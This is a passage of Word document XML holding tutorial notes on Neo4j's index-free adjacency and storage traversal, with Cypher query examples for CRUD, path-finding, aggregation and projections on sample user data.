    <w:p w14:paraId="28E7D386" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  No index required for record lookup — direct byte offset calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA857B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFBCAB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Traversal mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24859EB3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1. Find start node: node_record = read_file(node_id × 15 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352603CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  2. Follow relationships: rel_id = node_record.next_rel_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6CDA51" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     rel_record = read_file(rel_id × 34 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01001F29" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  3. Get next relationship for this node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB8112D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     if rel_record.first_node == current_node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77EEC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">       next_rel = rel_record.first_node_next_rel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600FF7DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA50CF6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">       next_rel = rel_record.second_node_next_rel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF293C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  4. Repeat until all relationships traversed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470DC3E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76215E57" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Traversal = following doubly-linked list of relationship records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D1F3F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  No JOIN, no index lookup, no table scan — pure pointer following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314A69A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Each hop = O(degree) pointer dereferences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A483F61" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4597C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>This is "index-free adjacency" — the key neo4j property:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D9BD71" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Traditional: finding a node's neighbors requires index lookup (O(log N))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59457842" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Neo4j: neighbors are directly accessible via relationship pointers (O(1) per hop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59235E82" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED7599" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  At 1 billion nodes: traversal performance identical to 1 million nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC53649" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Because: traversal complexity depends on graph structure, not graph size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C08834" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cypher Query Language — The Graph Query Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59360C21" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C34A5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cypher fundamentals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC4B92" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Nodes: (variable:Label {property: value})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC11A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Relationships: -[:TYPE {property: value}]-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D3569" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Patterns: (a)-[r]-&gt;(b)  -- any direction: (a)-[r]-(b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A6FAF4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F61538" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Basic CRUD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98D01F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="647519BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE (u:User {id: 1, name: 'Alice', age: 30})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6957C0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE (u:User {id: 2, name: 'Bob', age: 25})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135856C4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (a:User {id: 1}), (b:User {id: 2})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0553FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE (a)-[:FRIEND {since: date('2020-01-01')}]-&gt;(b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A736F31" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D8EAE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: 'Alice'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D787EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SET u.email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178632FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EEE0D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: 'Alice'})-[r:FRIEND]-&gt;(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF2FE7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DELETE r  -- remove friendship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333DA030" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E372129" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Traversal patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040005EE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0FF01B62" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Fixed depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957409E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: 'Alice'})-[:FRIEND]-&gt;(friends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356A1D8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN friends.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BE15D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A519D67" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Variable depth (1 to 6 hops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0810527C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: 'Alice'})-[:FRIEND*1..6]-&gt;(connected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75391F42" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN DISTINCT connected.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B711A5E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D5780" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Shortest path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E28AAF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (a:User {name: 'Alice'}), (b:User {name: 'Bob'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF5CD3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH path = shortestPath((a)-[:FRIEND*]-(b))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC8F13A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN length(path), [node IN nodes(path) | node.name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB3176" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14054B38" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- All shortest paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A236488" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (a:User {name: 'Alice'}), (b:User {name: 'Bob'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD4904C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH path = allShortestPaths((a)-[:FRIEND*]-(b))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B073C0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075552D0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56A2AB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Pattern matching with conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB614C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User)-[:PURCHASED]-&gt;(p:Product)&lt;-[:PURCHASED]-(other:User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC07F17" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE u.name = 'Alice'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8976E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    AND NOT (u)-[:FRIEND]-(other)  -- who purchased same products but isn't a friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35363D64" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN other.name, COUNT(p) AS shared_purchases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDE46A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY shared_purchases DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6790B476" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567F9BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4D6EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Advanced Cypher:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161600F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="652FC67D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Collect and aggregate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DEA38A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User)-[:FRIEND]-&gt;(friends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34E82F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN u.name, COLLECT(friends.name) AS friend_names, COUNT(*) AS friend_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC2113" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY friend_count DESC LIMIT 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304DB31D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD37E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- UNWIND (expand list into rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B56C22" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WITH ['Alice', 'Bob', 'Charlie'] AS names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02336F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  UNWIND names AS name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C166C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: name})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74F2B2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F58C0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C9F88" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Map projections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E90FFD2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: 'Alice'})-[:FRIEND]-&gt;(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2E5D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN f { .name, .age, friend_count: size((f)-[:FRIEND]-&gt;()) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79285F0A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2FF17" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Pattern comprehension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6590E3F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {name: 'Alice'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0285F63D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN [(u)-[:FRIEND]-&gt;(f) | f.name] AS friend_names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68443988" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Graph algorithms — where Neo4j excels:</w:t>
      </w:r>
    </w:p>
